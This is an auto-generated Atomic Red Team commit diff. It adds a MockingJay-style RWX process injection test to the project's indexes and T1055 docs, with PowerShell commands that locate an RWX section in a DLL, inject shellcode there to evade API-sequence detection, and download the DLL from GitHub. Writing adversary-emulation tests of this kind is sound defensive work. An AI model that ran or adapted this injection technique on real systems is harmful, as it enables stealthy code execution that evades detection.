Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -177,6 +177,7 @@ defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1
 defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 defense-evasion,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
+defense-evasion,T1055,Process Injection,5,Read-Write-Execute process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
@@ -644,6 +645,7 @@ privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e
 privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 privilege-escalation,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
+privilege-escalation,T1055,Process Injection,5,Read-Write-Execute process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -94,6 +94,7 @@ defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1
 defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 defense-evasion,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
+defense-evasion,T1055,Process Injection,5,Read-Write-Execute process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
@@ -424,6 +425,7 @@ privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e
 privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 privilege-escalation,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
+privilege-escalation,T1055,Process Injection,5,Read-Write-Execute process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -239,6 +239,7 @@
   - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
+  - Atomic Test #5: Read-Write-Execute process Injection [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
   - Atomic Test #1: mavinject - Inject DLL into running process [windows]
@@ -919,6 +920,7 @@
   - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
+  - Atomic Test #5: Read-Write-Execute process Injection [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1611 Escape to Host](../../T1611/T1611.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -141,6 +141,7 @@
   - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
+  - Atomic Test #5: Read-Write-Execute process Injection [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
   - Atomic Test #1: mavinject - Inject DLL into running process [windows]
@@ -634,6 +635,7 @@
   - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
+  - Atomic Test #5: Read-Write-Execute process Injection [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -9145,6 +9145,44 @@ defense-evasion:
           | Stop-Process -Force
         name: powershell
         elevation_required: false
+    - name: Read-Write-Execute process Injection
+      auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c
+      description: "This test exploited the vulnerability in legitimate PE formats
+        where sections have RWX permission and enough space for shellcode.\nThe RWX
+        injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory,
+        thus evading detection mechanisms \nthat relied on API call sequences and
+        heuristics. The RWX injection utilises API call sequences: LoadLibrary -->
+        GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe
+        injected shellcode will open a message box and a notepad.\nRWX Process Injection,
+        also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore
+        details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe
+        original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vuln_dll:
+          description: vulnerable DLL
+          type: path
+          default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Utility to inject must exist on disk at specified location (#{vuln_dll})
+
+          '
+        prereq_command: 'if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
+      executor:
+        command: |
+          $address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
+          & "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
+        cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
+          Stop-Process -Force
+        name: powershell
+        elevation_required: true
   T1205:
     technique:
       modified: '2022-10-19T23:08:40.603Z'
@@ -37441,6 +37479,44 @@ privilege-escalation:
           | Stop-Process -Force
         name: powershell
         elevation_required: false
+    - name: Read-Write-Execute process Injection
+      auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c
+      description: "This test exploited the vulnerability in legitimate PE formats
+        where sections have RWX permission and enough space for shellcode.\nThe RWX
+        injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory,
+        thus evading detection mechanisms \nthat relied on API call sequences and
+        heuristics. The RWX injection utilises API call sequences: LoadLibrary -->
+        GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe
+        injected shellcode will open a message box and a notepad.\nRWX Process Injection,
+        also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore
+        details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe
+        original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vuln_dll:
+          description: vulnerable DLL
+          type: path
+          default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Utility to inject must exist on disk at specified location (#{vuln_dll})
+
+          '
+        prereq_command: 'if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
+      executor:
+        command: |
+          $address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
+          & "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
+        cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
+          Stop-Process -Force
+        name: powershell
+        elevation_required: true
   T1038:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -7046,6 +7046,44 @@ defense-evasion:
           | Stop-Process -Force
         name: powershell
         elevation_required: false
+    - name: Read-Write-Execute process Injection
+      auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c
+      description: "This test exploited the vulnerability in legitimate PE formats
+        where sections have RWX permission and enough space for shellcode.\nThe RWX
+        injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory,
+        thus evading detection mechanisms \nthat relied on API call sequences and
+        heuristics. The RWX injection utilises API call sequences: LoadLibrary -->
+        GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe
+        injected shellcode will open a message box and a notepad.\nRWX Process Injection,
+        also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore
+        details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe
+        original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vuln_dll:
+          description: vulnerable DLL
+          type: path
+          default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Utility to inject must exist on disk at specified location (#{vuln_dll})
+
+          '
+        prereq_command: 'if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
+      executor:
+        command: |
+          $address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
+          & "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
+        cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
+          Stop-Process -Force
+        name: powershell
+        elevation_required: true
   T1205:
     technique:
       modified: '2022-10-19T23:08:40.603Z'
@@ -31529,6 +31567,44 @@ privilege-escalation:
           | Stop-Process -Force
         name: powershell
         elevation_required: false
+    - name: Read-Write-Execute process Injection
+      auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c
+      description: "This test exploited the vulnerability in legitimate PE formats
+        where sections have RWX permission and enough space for shellcode.\nThe RWX
+        injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory,
+        thus evading detection mechanisms \nthat relied on API call sequences and
+        heuristics. The RWX injection utilises API call sequences: LoadLibrary -->
+        GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe
+        injected shellcode will open a message box and a notepad.\nRWX Process Injection,
+        also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore
+        details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe
+        original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vuln_dll:
+          description: vulnerable DLL
+          type: path
+          default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Utility to inject must exist on disk at specified location (#{vuln_dll})
+
+          '
+        prereq_command: 'if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
+      executor:
+        command: |
+          $address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
+          & "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
+        cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
+          Stop-Process -Force
+        name: powershell
+        elevation_required: true
   T1038:
     technique:
       x_mitre_platforms:

atomics/T1055/T1055.md

@@ -16,6 +16,8 @@ More sophisticated samples may perform multiple process injections to segment mo
 
 - [Atomic Test #4 - Dirty Vanity process Injection](#atomic-test-4---dirty-vanity-process-injection)
 
+- [Atomic Test #5 - Read-Write-Execute process Injection](#atomic-test-5---read-write-execute-process-injection)
+
 
 <br/>
 
@@ -228,4 +230,61 @@ Get-Process -Name calc, CalculatorApp -ErrorAction SilentlyContinue | Stop-Proce
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Read-Write-Execute process Injection
+This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode.
+The RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms 
+that relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.
+The injected shellcode will open a message box and a notepad.
+RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes.
+More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
+The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 49543237-25db-497b-90df-d0a0a6e8fe2c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vuln_dll | vulnerable DLL | path | PathToAtomicsFolder&#92;T1055&#92;bin&#92;x64&#92;vuln_dll&#92;msys-2.0.dll|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
+& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
+```
+
+#### Cleanup Commands:
+```powershell
+Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Utility to inject must exist on disk at specified location (#{vuln_dll})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
+```
+
+
+
+
 <br/>